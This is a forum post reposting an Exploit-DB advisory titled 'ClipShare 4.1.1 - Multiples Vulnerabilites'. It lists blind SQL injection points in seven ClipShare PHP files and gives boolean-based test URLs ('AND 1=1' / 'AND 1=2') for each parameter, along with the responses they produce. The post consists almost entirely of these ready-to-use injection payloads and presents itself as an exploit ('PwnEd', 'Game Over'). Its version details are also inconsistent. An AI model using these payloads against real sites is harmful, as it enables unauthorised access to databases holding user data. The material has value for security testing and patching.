Gonzalez Posted March 28, 2013 Report Posted March 28, 2013 # Exploit Title: ClipShare 4.1.1 - Multiples Vulnerabilites# Exploit Author: Esac# Vulnerable Software: ClipShare - Video Sharing Community Script 4.1.4# Official site: http://www.clip-share.com# Software License: Commercial.#all versions are vulnerable:#Last Checked: 27 March 2013# Note : to exploit this vulnerability MAGIC_QUOTES_GPC directive must be turned off on server side.(php.ini)==============================================================================================vuln file : gvideos.php , param : gidPoc :http://server/mavideo/gvideos.php?gid=1 [Blind]#to exlploit this poc , must group to be added previously with some videos publicsReal exploitation :http://server/mavideo/gvideos.php?gid=1 AND 1=1==> return normal pagehttp://server/mavideo/gvideos.php?gid=1 AND 1=2==> return page with some errors ( or with nothing - white page )-------------------------------------------------------------------------------------------------------------------------------------------------vuln file : channel_detail.php , param : chidPoc :http://server/mavideo/channel_detail.php?chid=4 [Blind]Real exploitation :http://server/mavideo/channel_detail.php?chid=4 AND 1=1==> return normal pagehttp://server/mavideo/channel_detail.php?chid=4 AND 1=2==> return page with some errors ( or with nothing - white page )-------------------------------------------------------------------------------------------------------------------------------------------------vuln file : uprofile.php , param : UIDPoc :http://server/mavideo/uprofile.php?UID=66 [Blind]Real exploitation :http://server/mavideo/uprofile.php?UID=66 AND 1=1==> return normal pagehttp://server/mavideo/uprofile.php?UID=66 AND 1=2==> return page with some errors ( or with nothing - white page )-------------------------------------------------------------------------------------------------------------------------------------------------vuln file : ufavour.php , param : UIDPoc :http://server/mavideo/ufavour.php?UID=66 [Blind]Real exploitation :http://server/mavideo/ufavour.php?UID=66 AND 1=1==> return normal pagehttp://server/mavideo/ufavour.php?UID=66 AND 1=2==> return page with some errors ( or with nothing - white page )-------------------------------------------------------------------------------------------------------------------------------------------------vuln file : ufriends.php , param : UIDPoc :http://server/mavideo/ufriends.php?UID=66 [Blind]Real exploitation :http://server/mavideo/ufriends.php?UID=66 AND 1=1==> return normal pagehttp://server/mavideo/ufriends.php?UID=66 AND 1=2==> return page with some errors ( or with nothing - white page )-------------------------------------------------------------------------------------------------------------------------------------------------vuln file : uplaylist.php , param : UIDPoc :http://server/mavideo/uplaylist.php?UID=66 [Blind]Real exploitation :http://server/mavideo/uplaylist.php?UID=66 AND 1=1==> return normal pagehttp://server/mavideo/uplaylist.php?UID=66 AND 1=2==> return page with some errors ( or with nothing - white page )-------------------------------------------------------------------------------------------------------------------------------------------------vuln file : ugroups.php , param : UIDPoc :http://server/mavideo/ugroups.php?UID=66 [Blind]Real exploitation :http://server/mavideo/ugroups.php?UID=66 AND 1=1==> return normal pagehttp://server/mavideo/ugroups.php?UID=66 AND 1=2==> return page with some errors ( or with nothing - white page )-------------------------------------------------------------------------------------------------------------------------------------------------PwnEd.Tested version:Sunday , March 27, 2013 | Version: 4.1.4 | Username: admin | LogoutCopyright © 2006-2008 ClipShare. All rights reserved.~ Game Over ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~Greetz : White Tarbouch Team & Cobra & Dami==> Made In Moroco <==./EsacSource: Exploit-DB Quote
